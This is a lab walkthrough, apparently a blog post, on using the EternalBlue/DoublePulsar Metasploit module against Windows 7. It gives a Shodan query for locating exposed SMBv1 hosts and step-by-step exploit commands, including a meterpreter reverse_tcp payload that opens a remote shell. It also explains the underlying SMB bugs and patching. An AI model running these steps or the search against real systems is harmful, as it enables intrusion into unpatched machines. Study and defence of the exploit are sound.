Eternal Blue DoublePulsar Exploit

Eternal Blue

Quick intro Eternal Blue 101

What is Eternal Blue?

EternalBlue, sometimes stylized as ETERNALBLUE, is a cyber-attack exploit developed by the U.S. National Security Agency (NSA) according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the 2017 NotPetya cyberattack on June 27, 2017, and reported to be used as part of the Retefe banking trojan since at least September 5, 2017.

Shodan Search

There are still tons of vulnerable systems on the internet.

Shodan

Shodan search to identify potentially unpatched and affected systems:

port:445 “SMB Version: 1” os:Windows !product:Samba

image by author — shodan search

When run, we see that there are about 974,800 systems on the internet that could be vulnerable. This string does not search for vulnerabilities so we don’t know if these are patched systems or not.

Lab Set Up

In this lab, I will use Eternal Blue from GitHub and I will add the exploit to the Metasploit database (for the meterpreter shell purpose).

• Kali Linux
• Windows 7 64 architecture
• Eternal Blue Exploit Double Pulsar exploit from Github

ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Setting up Kali

1. Download Eternal Blue exploit from Github to the root directory
2. cd /root
3. git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
4. Adding the exploit to the Metasploit database

image by author — adding exploit to the metasploit database

5. Install and set up wine emulator to the root directory

image by author — wine emulator should be in the root directory

6. Nmap scan to identify open 445 port on the target machine

image by author — nmap scan

Set Up the Payload

1. msfconsole
2. use exploit/windows/smb/eternalblue_doublepulsar
3. info
4. set rhosts target machine IP address
5. set processinject lsass.exe (for 64 architecture)
6. set targetarchitecture x64
7. winepath — should be in the root directory
8. other options should be left as default

image by author — payload setup

image by author — payload setup

image by author — payload setup

9. set payload windows/x64/metepreter/reverse_tcp

image by author — payload setup

10. set lhost Kali IP address

11. other options should be left as default, then run exploit command

image by author — exploit resulting remote code injection and meterpreter shell

How Does Eternal Blue Work?

Eternal Blue relies on a Windows function namedsrv!SrvOS2FeaListSizeToNt. To see how this leads to remote code execution, let’s take a quick look at how SMB works.

Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, serial ports and miscellaneous communications between nodes on a network.

Eternal Blue exploits three bugs:

The first bug is a mathematical error when the protocol tries to cast an OS/2 FileExtended Attribute (FEA) list structure to an NT FEA structure in order to determine how much memory to allocate. A miscalculation creates an integer overflow that causes less memory to be allocated than expected, which in turns leads to a buffer overflow. With more data than expected being written, the extra data can overflow into adjacent memory space.

Triggering the buffer overflow is achieved thanks to the second bug, which results from a difference in the SMB protocol’s definition of two related sub commands: SMB_COM_TRANSACTION2 andSMB_COM_NT_TRANSACT.

Both have a _SECONDARY command that is used when there is too much data to include in a single packet. The crucial difference between TRANSACTION2 and NT_TRANSACT is that the latter calls for a data packet twice the size of the former. This is significant because an error in validation occurs if the client sends a crafted message using the NT_TRANSACT sub-command immediately before the TRANSACTION2 one.

While the protocol recognizes that two separate sub-commands have been received, it assigns the type and size of both packets (and allocates memory accordingly) based only on the type of the last one received. Since the last one is smaller, the first packet will occupy more space than it is allocated.

Once the attackers achieve this initial overflow, they can take advantage of a third bug in SMBv1 which allows heap spraying, a technique which results in allocating a chunk of memory at a given address. From here, the attacker can write and execute shellcode to take control of the system.

Summary

Eternal Blue exploit should work on every single unpatched Windows 7 and below including Windows XP (all services pack) (x86) (x64), Windows Server 2003 SP0 (x86),Windows Server 2003 SP1/SP2 (x86), Windows Server 2003 (x64),Windows Vista (x86), Windows Vista (x64), Windows Server 2008 (x86), Windows Server 2008 R2 (x86) (x64).

How to Stay Secure from Eternal Blue

If possible apply Microsoft patch MS17–10. If unable to do so disabling SMBv1 also mitigates the risk.